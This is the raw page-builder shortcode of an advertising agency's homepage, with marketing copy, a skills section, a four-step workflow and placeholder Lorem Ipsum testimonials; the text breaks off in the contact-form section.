custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" hover_enabled=\"0\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"3px||0px||false|false\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\" custom_margin_last_edited=\"on|phone\" padding_1_last_edited=\"on|phone\" padding_1_phone=\"0px|||10%|false|false\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" 